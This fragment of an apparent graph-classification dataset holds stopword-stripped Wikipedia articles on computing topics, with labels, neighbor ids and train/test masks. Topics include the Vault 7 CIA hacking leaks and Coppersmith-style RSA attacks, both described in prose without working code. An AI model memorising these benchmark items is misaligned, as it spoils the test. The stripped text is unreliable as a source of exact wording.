    "text": "Vault_7:vault 7 vault 7 series documents wikileaks began publish 7 march 2017 detail activities capabilities united states central intelligence agency perform electronic surveillance cyber warfare files dated 2013–2016 include details agency software capabilities ability compromise cars smart tvs web browsers including google chrome microsoft edge mozilla firefox opera software asa operating systems smartphones including apple ios google android well operating systems microsoft windows macos linux february 2017 wikileaks began teasing release vault 7 series cryptic messages twitter according media reports later february wikileaks released classified documents describing cia monitored 2012 french presidential election press release leak stated published context forthcoming cia vault 7 series march 2017 us intelligence law enforcement officials said international wire agency reuters aware cia security breach led vault 7 since late-2016 two officials said focusing contractors possible source leaks 2017 federal law enforcement identified cia software engineer joshua adam schulte suspected source vault 7 first batch documents named year zero published wikileaks 7 march 2017 consisting 7,818 web pages 943 attachments purportedly center cyber intelligence already contains pages former nsa contractor leaker edward snowden nsa release wikileaks name source said files circulated among former u.s. government hackers contractors unauthorized manner one provided wikileaks portions archive according wikileaks source wishes initiate public debate security creation use proliferation democratic control cyberweapons since tools raise questions urgently need debated public including whether c.i.a hacking capabilities exceed mandated powers problem public oversight agency wikileaks redacted names identifying information documents release attempting allow connections people drawn via unique identifiers generated wikileaks also said would postpone releasing source code cyber weapons reportedly several hundred million lines long consensus emerges technical political nature c.i.a program 'weapons analyzed disarmed published wikileaks founder julian assange claimed part larger series cia released statement saying american public deeply troubled wikileaks disclosure designed damage intelligence community ability protect america terrorists adversaries disclosures jeopardize us personnel operations also equip adversaries tools information us harm assange held press conference 9 march offer share unpublished data vault 7 technology companies enable fix vulnerabilities detailed therein stated 1 total leak released much remainder leak included unpatched vulnerabilities working microsoft apple google get vulnerabilities patched would release information would put public risk fixes released manufacturers would release details vulnerabilities none vulnerabilities currently released zero-day exploits press release assange also read official statement microsoft stated microsoft desire next geneva convention would protect people government cyber weapons way previous geneva conventions protected noncombatants warfare statement issued 19 march 2017 assange said technology companies contacted agreed disagreed questioned termed wikileaks standard industry disclosure plan standard disclosure time vulnerability 90 days company responsible patching software given full details flaw according wikileaks mozilla provided information vulnerabilities google companies confirmed receiving initial notification wikileaks stated lagging companies conflicts interest due classified work us government agencies practice associations limit industry staff us security clearances fixing holes based leaked information cia companies choose secure users cia nsa attacks users may prefer organizations mozilla european companies prioritize users government contracts 23 march 2017 wikileaks published vault 7 part 2 dark matter publication includes documentation several cia efforts hack apple iphones macs 31 march 2017 wikileaks published vault 7 part 3 marble contained 676 source code files cia marble framework used obfuscate scramble malware code attempt make anti-virus firms investigators understand code attribute source according wikileaks code also included de-obfuscator reverse obfuscation effects 7 april 2017 wikileaks published vault 7 part 4 dubbed grasshopper publication contains 27 documents cia grasshopper framework used cia build customized persistent malware payloads microsoft windows operating systems grasshopper focused personal security product psp avoidance psps antivirus software ms security essentials symantec endpoint kaspersky 14 april 2017 wikileaks published vault 7 part 5 titled hive based cia top-secret virus program created embedded development branch edb six documents published wikileaks related hive multi-platform cia malware suite cia back-end infrastructure public-facing https interface used cia transfer information target desktop computers smartphones cia open devices receive commands cia operators execute specific tasks also called listening post lp command control c2 hiding presence behind unsuspicious-looking public domains masking interface known switchblade 21 april 2017 wikileaks published vault 7 part 6 code-named weeping angel hacking tool co-developed cia mi5 used exploit series smart tvs purpose covert intelligence gathering installed suitable televisions usb stick hacking tool enables televisions built-in microphones possibly video cameras record surroundings televisions falsely appear turned recorded data either stored locally television memory sent internet cia allegedly cia mi5 agencies collaborated develop malware coordinated work joint development workshops part 6 publication weeping angel second major cia hacking tool notably references british television show dr. alongside sonic screwdriver dark matter 28 april 2017 wikileaks published vault 7 part 7 scribbles leak includes documentation source code tool intended track documents leaked whistleblowers journalists embedding web beacon tags classified documents trace leaked tool affects microsoft office documents specifically microsoft office 2013 windows 8.1 x64 documents office versions 97-2016 office 95 documents work ocuments locked encrypted password-protected cia watermarked document opened invisible image within document hosted agency server loaded generating http request request logged server giving intelligence agency information opening opened however watermarked document opened alternative word processor image may visible viewer documentation also states document viewed offline protected view watermarked image able contact home server overridden user enables editing 5 may 2017 wikileaks published vault 7 part 8 archimedes according u.s. sans institute instructor jake williams analyzed published documents archimedes virus previously codenamed fulcrum according cyber security expert enisa member pierluigi paganini cia operators use archimedes redirect local area network lan web browser sessions targeted computer computer controlled cia sessions routed users type attack known man-in-the-middle mitm publication wikileaks included number hashes claim used potentially identify archimedes virus guard future paganini stated potential targeted computers search hashes systems check systems attacked cia 12 may 2017 wikileaks published vault 7 part 9 aftermidnight assassin aftermidnight malware installed target personal computer disguises dll file executed user computer reboots triggers connection cia command control c2 computer downloads various modules run assassin similar aftermidnight counterpart deceptively runs inside windows service process cia operators reportedly use assassin c2 execute series tasks collect periodically send user data cia listening post lp similar backdoor trojan behavior aftermidnight assassin run windows operating system persistent periodically beacon configured lp either request tasks send private information cia well automatically uninstall set date time 19 may 2017 wikileaks published vault 7 part 10 athena published user guide demo related documents created september 2015 february 2016 malware allegedly developed cia august 2015 roughly one month microsoft released windows 10 firm statements difficult compromise primary athena malware secondary malware named hera similar theory grasshopper aftermidnight malware significant differences one differences athena hera developed cia new hampshire private corporation called siege technologies bloomberg 2014 interview founder siege technologies confirmed justified development malware athena malware completely hijacks windows remote access services hera hijacks windows dnscache service also athena hera affect current versions windows including limited windows server 2012 windows 10 another difference types encryption used infected computers cia listening posts lp similarities exploit persistent dll files create backdoor communicate cia lp steal private data send cia servers delete private data target computer well command control c2 cia operatives send additional malicious software run specific tasks attacked computer designed deceive computer security software beside published detailed documents wikileaks provided evidence suggesting cia used athena 1 june 2017 wikileaks published vault 7 part 11 pandemic tool serves persistent implant affecting windows machines shared folders functions file system filter driver infected computer listens server message block traffic detecting download attempts computers local network pandemic answer download request behalf infected computer however replace legitimate file malware order obfuscate activities pandemic modifies replaces legitimate file transit leaving original server unchanged implant allows 20 files modified time maximum individual file size 800mb stated leaked documentation possible newly infected computers could become pandemic file servers allowing implant reach new targets local network 15 june 2017 wikileaks published vault 7 part 12 cherry blossom 22 june 2017 wikileaks published vault 7 part 13 brutal kangaroo 28 june 2017 wikileaks published vault 7 part 14 elsa 29 june 2017 wikileaks published vault 7 part 15 outlawcountry 6 july 2017 wikileaks published vault 7 part 16 bothanspy 13 july 2017 wikileaks published vault 7 part 17 highrise ucl raytheon 19 july 2017 imperial 27 july 2017 dumbo 3 august 2017 couchpotato 10 august 2017 wikileaks publishes secret documents expresslane project cia documents show one cyber operations cia conducts liaison services -- includes among many others national security agency nsa department homeland security dhs federal bureau investigation fbi ots office technical services branch within cia biometric collection system provided liaison services around world -- expectation sharing biometric takes collected systems 'voluntary sharing obviously work considered insufficient cia expresslane covert information collection tool used cia secretly exfiltrate data collections systems provided liaison services expresslane installed run cover upgrading biometric software ots agents visit liaison sites liaison officers overseeing procedure remain unsuspicious data exfiltration disguises behind windows installation splash screen core components ots system based products cross match us company specializing biometric software law enforcement intelligence community company hit headlines 2011 reported us military used cross match product identify osama bin laden assassination operation pakistan.- 24 august 2017 angelfire 31 august 2017 protego 7 september 2017 asked authenticity former director central intelligence agency michael hayden replied organization comment authenticity content purported intelligence documents however speaking condition anonymity current former intelligence officials said documents appear genuine edward snowden tweeted shortly documents release looked authentic robert m. chesney law professor university texas director technology public policy program center strategic international studies csis likened vault 7 nsa hacking tools disclosed 2016 group calling shadow brokers 15 march 2017 president donald trump stated interview cia hacked lot things taken following day statement democratic congressman adam schiff ranking member house intelligence committee wrote news release effort blame obama president appeared discussed something true accurate would otherwise considered classified information schiff also said president power declassify whatever wants wikileaks said documents came isolated high-security network situated inside cia center cyber intelligence cci langley virginia documents allowed wikileaks partially determine structure organization cci cci reportedly entire unit devoted compromising apple products cybersecurity firm symantec analyzed vault 7 documents found described software closely matched cyberattacks longhorn monitored since 2014 symantec previously suspected longhorn government-sponsored tracked usage 40 targets 16 countries first portion documents made public 7 march 2017 vault 7 year zero revealed top secret cia unit used german city frankfurt starting point hacking attacks europe china middle east according documents u.s. government uses consulate general office frankfurt hacker base cyber operations wikileaks documents reveal frankfurt hackers part center cyber intelligence europe ccie given cover identities diplomatic passports obfuscate customs officers gain entry germany chief public prosecutor general federal court justice karlsruhe peter frank announced 8 march 2017 government conducting preliminary investigation see launch major probe activities conducted consulate also broadly whether people germany attacked cia germany foreign minister sigmar gabriel social democratic party responded documents vault 7 year zero cia used frankfurt base digital espionage operations saying germany information cyber attacks documents reportedly revealed agency amassed large collection cyberattack techniques malware produced hackers library reportedly maintained cia remote devices branch umbrage group examples using techniques source code contained umbrage component library git repository according wikileaks recycling techniques third-parties umbrage cia increase total number attacks also mislead forensic investigators disguising attacks work groups nations among techniques borrowed umbrage file wiping implementation used shamoon according pc world techniques code snippets used cia internal projects whose end result inferred leaks pc world noted practice planting false flags deter attribution new development cyberattacks russian north korean israeli hacker groups among suspected using false flags according study kim zetter intercept umbrage probably much focused speeding development repurposing existing tools rather planting false flags robert graham ceo errata security told intercept source code referenced umbrage documents extremely public likely used multitude groups state actors graham added conclusively say evidence documents 're creating snippets code use projects 're reusing methods code find internet ... elsewhere talk obscuring attacks ca n't see coming concrete plan false flag operation 're trying say 'we 're going make look like russia day vault 7 documents first released wikileaks described umbrage substantial library attack techniques 'stolen malware produced states including russian federation tweeted cia steals groups virus malware facilitating false flag attacks conspiracy theory soon emerged alleging cia framed russian government interfering 2016 u.s. elections conservative commentators sean hannity ann coulter speculated possibility twitter rush limbaugh discussed radio show russian foreign minister sergey lavrov said vault 7 showed cia could get access 'fingerprints use cybersecurity writers ben buchanan kevin poulsen skeptical theories poulsen wrote leaked catalog n't organized country origin specific malware used russian dnc hackers nowhere list documents describe marble framework string obfuscator used hide text fragments malware visual inspection part program foreign languages used cover source cia hacks according wikileaks reached 1.0 2015 used cia throughout 2016 release wikileaks described primary purpose marble insert foreign language text malware mask viruses trojans hacking attacks making difficult tracked cia cause forensic investigators falsely attribute code wrong nation source code revealed marble examples chinese russian korean arabic persian languages us main cyber-adversaries – china russia north korea iran analysts called wikileaks description marble main purpose inaccurate telling hill main purpose probably avoid detection antivirus programs marble also contained deobfuscator tool cia could reverse text obfuscation security researcher nicholas weaver international computer science institute berkeley told washington post appears one technically damaging leaks ever done wikileaks seems designed directly disrupt ongoing cia operations hammerdrill cd/dvd collection tool collects directory walks files configured directory filename pattern well logging cd/dvd insertion removal events v2.0 adds gap jumping capability trojans 32-bit executables burned disc nero additionally v2.0 adds status termination on-demand collection feature controlled hammerdrillstatus.dll hammerdrillkiller.dll hammerdrillcollector.dll logging also fingerprints discs hashing first two blocks iso image enables unique identification multi-sessions discs even data added removed log also logs anytime hammerdrill trojaned binary seen disc wikileaks released first installment vault 7 year zero apple stated many issues leaked today already patched latest ios company continue work rapidly address identified vulnerabilities 23 march 2017 wikileaks released dark matter second batch documents vault 7 series detailing hacking techniques tools focusing apple products developed embedded development branch edb cia leak also revealed cia targeting iphone since 2008 year device released edb projects attacked apple firmware meaning attack code would persist even device rebooted dark matter archive included documents 2009 2013 apple issued second statement assuring based initial analysis alleged iphone vulnerability affected iphone 3g fixed 2009 iphone 3gs released additionally preliminary assessment showed alleged mac vulnerabilities previously fixed macs launched 2013 wikileaks said 19 march 2017 twitter cia secretly exploiting vulnerability huge range cisco router models discovered thanks vault 7 documents cia learned year ago exploit flaws cisco widely used internet switches direct electronic traffic enable eavesdropping cisco quickly reassigned staff projects turn focus solely analyzing attack figure cia hacking worked could help customers patch systems prevent criminal hackers spies using similar methods 20 march cisco researchers confirmed study vault 7 documents showed cia developed malware could exploit flaw found 318 cisco switch models alter take control network cisco issued warning security risks patches available cisco provided mitigation advice electronic tools reportedly compromise apple ios google android operating systems adding malware android operating system tools could gain access secure communications made device according wikileaks android smartphone penetrated agency collect audio message traffic encryption applied agency software reportedly able gain access messages sent instant messaging services method accessing messages differs obtaining access decrypting already encrypted message encryption messengers offer end-to-end encryption telegram whatsapp signal n't reported cracked encryption bypassed capturing input encryption applied methods keylogging recording touch input user commentators among snowden cryptographer security pundit bruce schneier observed wikileaks incorrectly implied messaging apps underlying encryption compromised implication turn reported period new york times mainstream outlets one document reportedly showed cia researching ways infect vehicle control systems wikileaks stated purpose control specified would permit cia engage nearly undetectable assassinations statement brought renewed attention conspiracy theories surrounding death michael hastings documents refer windows fax dll injection exploit windows xp windows vista windows 7 operating systems would allow user malicious intents hide malware dll another application however computer must already compromised another method injection take place 7 march 2017 edward snowden commented importance release stating reveals united states government developing vulnerabilities us products intentionally keeping holes open considers highly reckless 7 march 2017 nathan white senior legislative manager internet advocacy group access writes 8 march 2017 lee mathews contributor forbes wrote hacking techniques described vault 7 already known many cybersecurity experts 8 march 2017 note revealed techniques tools likely used targeted surveillance revealed edward snowden press conference assange stated leaks content least means engage targeted attacks expensive might trail also stated exposed cia automated implant branch develops uses viruses also automates done may approach level bulk intersection 8 april 2017 ashley gorski american civil liberties union staff attorney called critical understand vulnerabilities exploited government foreign governments cyber criminals around world justin cappos professor computer science engineering department new york university asks government knows problem phone bad guys could use hack phone ability spy weakness use counterterrorism spying capabilities problem fix everyone 8 april 2017 cindy cohn executive director international non-profit digital rights group based san francisco electronic frontier foundation said c.i.a walking past front door saw lock broken least tell maybe even help get fixed worse lost track information kept criminals hostile foreign governments know broken lock furthermore stated cia failed accurately assess risk disclosing vulnerabilities even spy agencies like cia responsibility protect security privacy americans freedom private conversation – free worry hostile government rogue government agent competitor criminal listening – central free society strict privacy laws europe fourth amendment us constitution guarantee right free unreasonable searches seizures 12 may 2017 microsoft president chief legal officer brad smith wrote emerging pattern 2017 seen vulnerabilities stored cia show wikileaks words smith expressed concern fact cia stockpiled computer vulnerabilities turn stolen failed inform microsoft timely fashion security breach result privacy security customers around world potentially negatively affected extended period caused widespread damage",
    "neighbors": [
      1024,
      10756,
      11272,
      3092,
      535,
      9761,
      4644,
      4133,
      7730,
      1083,
      1608,
      3657,
      8779,
      4689,
      4703,
      8288,
      2148,
      8292,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      2213,
      9904,
      9395,
      8886,
      10437,
      3789,
      4813,
      7887,
      4304,
      10450,
      7893,
      4314,
      9435,
      3807,
      1251,
      5349,
      1254,
      4326,
      3305,
      10477,
      9460,
      4863,
      2815,
      3843,
      10502,
      9488,
      10003,
      6431,
      1315,
      5924,
      297,
      8489,
      11052,
      9518,
      7983,
      823,
      6474,
      4940,
      6484,
      857,
      1882,
      7515,
      3423,
      9569,
      5479,
      3944,
      3956,
      9082,
      1417,
      11152,
      3473,
      10132,
      1946,
      1440,
      5024,
      3495,
      11175,
      5547,
      1970,
      441,
      1979,
      4027,
      4054,
      9688,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 298,
    "label": 4,
    "text": "Coppersmith's_attack:coppersmith attack coppersmith attack describes class cryptographic attacks public-key cryptosystem rsa based coppersmith method particular applications coppersmith method attacking rsa include cases public exponent e small partial knowledge secret key available public key rsa system tuple integers formula_1 n product two primes p q secret key given integer satisfying formula_2 equivalently secret key may given formula_3 formula_4 chinese remainder theorem used improve speed decryption see crt-rsa encryption message produces ciphertext formula_5 decrypted using formula_6 computing formula_7 order reduce encryption signature-verification time useful use small public exponent formula_8 practice common choices formula_8 3 17 65537 formula_10 values e fermat primes sometimes referred formula_11 formula_12 respectively formula_13 chosen make modular exponentiation operation faster also chosen formula_8 simpler test whether formula_15 formula_16 generating testing primes step 1 key generation values formula_17 formula_18 fail test rejected even better e prime greater 2 test formula_19 replace expensive test formula_20 public exponent small plaintext formula_21 short rsa function may easy invert makes certain attacks possible padding schemes ensure messages full lengths additionally choosing public exponent formula_22 recommended value used signature-verification requires 17 multiplications opposed 25 random formula_8 similar size used unlike low private exponent see wiener attack attacks apply small formula_8 used far total break would recover secret key powerful attacks low public exponent rsa based following theorem due coppersmith theorem states existence algorithm efficiently find roots formula_34 modulo formula_35 smaller formula_36 formula_37 gets smaller algorithm runtime decrease theorem strength ability find small roots polynomials modulo composite formula_35 simplest form håstad attack presented ease understanding general case uses coppersmith method suppose one sender sends message formula_39 encrypted form number people formula_40 using small public exponent formula_8 say formula_42 different moduli formula_43 simple argument shows soon formula_44 ciphertexts known message formula_45 longer secure suppose eve intercepts formula_46 formula_47 formula_48 may assume formula_49 formula_50 otherwise possible compute factor one formula_51 ’ computing formula_52 chinese remainder theorem may compute formula_53 formula_54 formula_55 however since formula_56 formula_57 formula_58 thus formula_59 holds integers eve compute cube root formula_60 obtain formula_45 larger values formula_8 ciphertexts needed particularly formula_8 ciphertexts sufficient håstad also showed applying linear-padding formula_39 prior encryption protect attack assume attacker learns formula_65 formula_66 linear function formula_67 i.e. bob applies pad message formula_45 prior encrypting recipients receive slightly different messages instance formula_45 formula_21 bits long bob might encrypt formula_71 send formula_57-th recipient large enough group people involved attacker recover plaintext formula_73 ciphertext similar methods generality håstad proved system univariate equations modulo relatively prime composites applying fixed polynomial formula_74 could solved sufficiently many equations provided attack suggests randomized padding used rsa encryption since formula_51 relatively prime chinese remainder theorem might used compute coefficients formula_88 satisfying formula_89 formula_90 formula_91 setting formula_92 know formula_93 since formula_94 nonzero formula_95 also nonzero degree formula_95 formula_18 coppersmith ’ theorem may compute integer roots formula_98 satisfying formula_99 formula_100 however know formula_101 formula_39 among roots found coppersmith theorem theorem applied problem broadcast rsa following manner suppose formula_57-th plaintext padded polynomial formula_104 formula_105 formula_106 true coppersmith ’ method used attack succeeds formula_107 formula_78 number messages original result used håstad ’ variant instead full coppersmith method result required formula_109 messages formula_110 franklin-reiter identified new attack rsa public exponent formula_42 two messages differ known fixed difference two messages rsa encrypted rsa modulus formula_35 possible recover let formula_113 alice public key suppose formula_114 two distinct messages satisfying formula_115 publicly known polynomial formula_116 send formula_117 formula_118 alice bob may naively encrypt messages transmit resulting ciphertexts formula_119 eve easily recover formula_120 given formula_119 using following theorem arbitrary formula_8 rather restricting formula_42 time required quadratic formula_8 formula_130 since formula_135 know formula_118 root polynomial formula_137 similarly formula_118 root formula_139 linear factor formula_140 divides polynomials therefore eve calculates greatest common divisor gcd formula_141 formula_142 gcd turns linear formula_118 found gcd computed quadratic time formula_8 formula_130 using euclidean algorithm like håstad ’ franklin-reiter ’ attack attack exploits weakness rsa public exponent formula_42 coppersmith showed randomized padding suggested håstad used improperly rsa encryption secure suppose bob sends message formula_45 alice using small random padding encrypting attacker eve intercepts ciphertext prevents reaching destination bob decides resend formula_45 alice alice respond message randomly pads formula_45 transmits resulting ciphertext eve two ciphertexts corresponding two encryptions message using two different random pads even though eve know random pad used still recover message formula_45 using following theorem random padding short define formula_168 formula_169 know formula_170 polynomials formula_171 common root words formula_172 root resultant formula_173 furthermore formula_174 hence formula_175 small root formula_176 modulo formula_35 eve efficiently find using coppersmith method formula_175 known franklin-reiter attack used recover formula_118 consequently formula_45",
    "neighbors": [
      8674,
      4644,
      9576,
      3629,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 299,
    "label": 7,
    "text": "European_Cloud_Partnership:european cloud partnership european cloud partnership ecp advisory group set european commission part european cloud computing strategy provide guidance development cloud computing european union ecp led steering board composed representatives telecom industry well european government policy makers publishing document unleashing potential cloud computing europe european commission set european cloud partnership 2012 steering board including government industry representatives ecp first meeting held 19 november 2012 chaired president estonia toomas hendrik ilves 2013 ecp began drafting charter year information prism scandal came light ecp emphasized need europe develop cloud infrastructure rather depend united states completed report titled trusted cloud europe february 2014 defining policy outlining process effective public private sector participation cloud computing development europe report recommended commission identify technical legal operational best practices promote certifications guidelines facilitate recognition across national boundaries report also recommended commission identify cloud computing stakeholders help work together consultations workshops march 2014 european commission invited external parties submit opinions take part discussion forum complete online survey response report",
    "neighbors": [
      6344
    ],
    "mask": "None"
  },
  {
    "node_id": 300,
    "label": 4,
    "text": "Underhanded_C_Contest:underhanded c contest underhanded c contest programming contest turn code malicious passes rigorous inspection looks like honest mistake even discovered contest rules define task malicious component entries must perform task malicious manner defined contest hide malice contestants allowed use c-like compiled languages make programs contest organized dr. scott craver department electrical engineering binghamton university new york state contest initially inspired daniel horn ’ obfuscated v contest fall 2004 2005 2008 contests prize 100 gift certificate thinkgeek 2009 contest prize increased 200 due late announcement winners prize 2013 contest also 200 gift certificate 2005 contest task basic image processing resampling smoothing covertly inserting unique useful fingerprinting data image winning entries 2005 used uninitialized data structures reuse pointers embedding machine code constants 2006 contest required entries count word occurrences vastly different runtimes different platforms accomplish task entries used fork implementation errors optimization problems endian differences various api implementation differences winner called strlen loop leading quadratic complexity optimized linux compiler windows 2007 contest required entries encrypt decrypt files strong readily available encryption algorithm low percentage 1 0.01 encrypted files may cracked reasonably short time contest commenced april 16 ended july 4 entries used misimplementations rc4 misused api calls incorrect function prototypes 2008 contest required entries redact rectangular portion ppm image way portion may reconstructed method blocking rectangle allowed long original pixels removed pixel reconstruction n't perfect although reconstruction fidelity original file would factor judging contest began june 12 ended september 30 entries tended either xor region retrievable pseudo-random mask append masked data end file format two placing programs used improperly defined macros winner choosing work uncommon text based format zeroed pixel values keeping number digits intact 2009 contest required participants write program sifts routing directives redirects piece luggage based innocuous-looking comment space-delimited input data file contest began december 29 2009 due end march 1 2010 however activity occurred three years winners announced april 1 2013 one overall winner six runners-up 2013 contest announced april 1 2013 due july 4 2013 results announced september 29 2014 fictional social website called obsessbook challenge write function compute derpcon degrees edge-reachable personal connection two users accidentally computes low distance special user 2014 contest announced november 2 2014 due january 1 2015 results announced june 1 2015 object write surveillance code twitter-like social networking service comply secret government surveillance request non-obvious reasons code must subtly leak act surveillance user general approach obfuscate writes user data writing surveillance data winning entry implementing buggy time-checking function overwrites input 2015 contest announced august 15 2015 due november 15 2015 results announced january 15 2016 scenario nuclear disarmament process peoples glorious democratic republic alice glorious democratic peoples republic bob alice bob mission write test function comparing potentially fissile material reference sample certain circumstances would label warhead containing fissile material n't around third submissions used nan poisioning erronous floating-point operations generates nan later computation always evaluates false comparison",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      9233,
      8978,
      4863,
      4883,
      5245,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      4165,
      2508,
      7421,
      7515,
      4344,
      3941,
      107,
      8171,
      877,
      3320,
      2041,
      2045,
      1279
    ],
    "mask": "Validation"
  },
  {
    "node_id": 301,
    "label": 1,
    "text": "Australian_Heritage_Database:australian heritage database australian heritage database listing heritage sites australia maintained department environment water heritage arts australia consultation australian heritage council twenty thousand entries database includes natural historic indigenous places lists covered database",
    "neighbors": [
      8655
    ],
    "mask": "Test"
  },
  {
    "node_id": 302,
    "label": 6,
    "text": "Steganographic_file_system:steganographic file system steganographic file systems kind file system first proposed ross anderson roger needham adi shamir paper proposed two main methods hiding data series fixed size files originally consisting random bits top 'vectors could superimposed way allow levels security decrypt lower levels even know existence higher levels entire partition filled random bits files hidden steganographic file system using second scheme files merely stored stored encrypted entire partition randomized encrypted files strongly resemble randomized sections partition files stored partition easy way discern meaningless gibberish actual encrypted files furthermore locations files derived key files locations hidden available programs passphrase leads problem quickly files overwrite birthday paradox compensated writing files multiple places lessen chance data loss may seem point file system guaranteed either grossly inefficient storage space-wise cause data loss corruption either data collisions loss key addition complex system poor read/write performance performance goal stegfs rather stegfs intended thwart rubberhose attacks usually work encrypted files distinguishable regular files authorities coerce user user gives keys files distinguishable regular files however since steganographic file system number files unknown every byte looks like encrypted byte authorities know many files hence keys stored user plausible deniability — say innocuous files none anybody without keys gainsay user poul-henning kamp criticized threat model steganographic file systems paper gbde observing certain coercive situations especially searched-for information fact stored steganographic file systems possible subject get hook proving keys surrendered methods exist method laid one implemented stegfs possible steganographically hide data within image e.g pngdrive audio files- scramdisk linux loop device generally steganographic file system implemented steganographic layer supplies storage mechanism example steganographic file system layer existing mp3 files file contains chunk data part file system final product file system hardly detected depending steganographic layer store kind file regular file system hierarchy truecrypt allows hidden volumes two passwords open different volumes file one volumes contains secret data",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      3629,
      7225,
      11323,
      2110,
      8772,
      9289,
      1109,
      9306,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      251,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1453,
      1454,
      6062,
      8114,
      7603,
      8627,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 303,
    "label": 9,
    "text": "GLBasic:glbasic glbasic commercial basic programming language compile various platforms including windows linux mac os x well handheld devices language designed simple intuitive glbasic started interpreted language 2d commands gl stands graphics language uses gcc compiler many different platforms achieve fast native code results glbasic precompiler gpc converts simple basic language c++ code compiles later thus user extend glbasic using inline command mix c/c++ code directly glbasic source code due glbasic easily access third-party dynamic libraries platforms glbasic sdk comes ide debugger graphics engine built opengl opengl es platforms windows linux mac os x ios webos handheld devices windows mobile gp2x gp2x wiz glbasic uses close-to-hardware routines fast graphics compile iphone ipad need mac compile generated code comply apple requirements latest version xcode free download apple website able actually run program iphone ipad glbasic programs work emulator need member iphone apple developer connection since release 8.054 beta became possible compile open pandora machine well however lack windows programming tools half compiling process performed windows half actual machine since version 10 ide directly builds packages windows pandora version 8.230 compile web-os devices like palm pre without additional hardware developer program membership requirements support hp touchpad added september 2011 via web-update version 10.057 added support build application packages running android devices glbasic comes numerous examples apps created glbasic uploaded apple app store google play hp app catalog require developer account costs developer pre-publication review level depend publisher used apple ios ios developer program costs us 99 per year apps published app store required undergo two-week review-and-approval process prior publication android one-time fee us 25 apps published via google playstore subject approval process immediately available public publishing via hp app catalog requires free account apps placed sale hp app catalog undergo five-day review process publication wrapper intel appup centre sdk also available glbasic glbasic following features glbasic comes source code ddgui easy-to-use gui system allowing supported platforms look feel across platforms windows linux mac glbasic ported tcl/tk wrapper offers native os look glbasic gone following revisions hello world version 8 glbasic added basic object-oriented commands type command allows structures access using 'self command functions within types type tvec version 8 also ability encrypt using 128-bit blowfish decrypt strings due author problems arm64 ios compilers various problems insufficient time update software source code forum post made forum members post count least 100 download weighs around 2.5 gb compressed",
    "neighbors": [
      9732,
      3718,
      6154,
      6539,
      7691,
      1805,
      6797,
      9997,
      786,
      5395,
      11412,
      4885,
      22,
      2583,
      3736,
      3481,
      9881,
      797,
      5663,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      7343,
      7983,
      11315,
      823,
      315,
      7355,
      7486,
      7870,
      4160,
      321,
      4674,
      6338,
      8644,
      8262,
      10750,
      712,
      5833,
      4171,
      8524,
      847,
      2258,
      11219,
      9045,
      1879,
      92,
      8413,
      11229,
      1632,
      2915,
      9188,
      4069,
      5733,
      9063,
      8554,
      11243,
      5612,
      2285,
      2541,
      8429,
      10478,
      5747,
      759,
      6264,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 304,
    "label": 2,
    "text": "Ebuild:ebuild ebuild specialized bash script automates compilation installation procedures software packages format created gentoo linux project use portage software management system version application package portage repository specific ebuild script written script used emerge tool also created gentoo linux project calculate dependencies desired software installation download required files patch necessary configure package based use flag settings compile perform sandboxed installation /var/tmp/portage/ ebuild name /image/ default upon successful completion steps installed files merged live system outside sandbox although ebuilds found gentoo portage repository used compile programs source code also ebuilds install binary packages ebuilds install documentation data fonts basic ebuilds called metabuilds whose sole purpose trigger installation ebuilds gnome kde metabuilds",
    "neighbors": [
      1952,
      2560,
      10817,
      10022,
      4775,
      4841,
      5578,
      6898,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 305,
    "label": 9,
    "text": "Programming_language_generations:programming language generations programming languages classified several programming language generations historically classification used indicate increasing power programming styles later writers somewhat redefined meanings distinctions previously seen important became less significant current practice terms first generation second generation programming language used prior coining term third-generation none three terms mentioned early compendiums programming languages introduction third generation computer technology coincided creation new generation programming languages marketing generational shift machines correlated several important changes called high level programming languages discussed giving technical content second/third-generation distinction among high level programming languages well reflexively renaming machine code languages first generation assembly languages second generation initially programming languages higher level assembly termed third-generation later term fourth-generation introduced try differentiate new declarative languages prolog domain-specific languages claimed operate even higher level domain even closer user e.g natural language level original imperative high level languages pascal c algol fortran basic etc generational classification high level languages 3rd generation later never fully precise later perhaps abandoned precise classifications gaining common usage object-oriented declarative functional c gave rise c++ later java c lisp clos ada ada 2012 even cobol cobol2002 new languages emerged generation well",
    "neighbors": [
      512,
      9345,
      6032,
      9877,
      9626,
      428,
      5677,
      10672,
      2045,
      4410,
      2374,
      8262,
      4042,
      8524,
      5845,
      3159,
      987,
      477,
      8421,
      4838,
      6502,
      9330,
      3960,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 306,
    "label": 3,
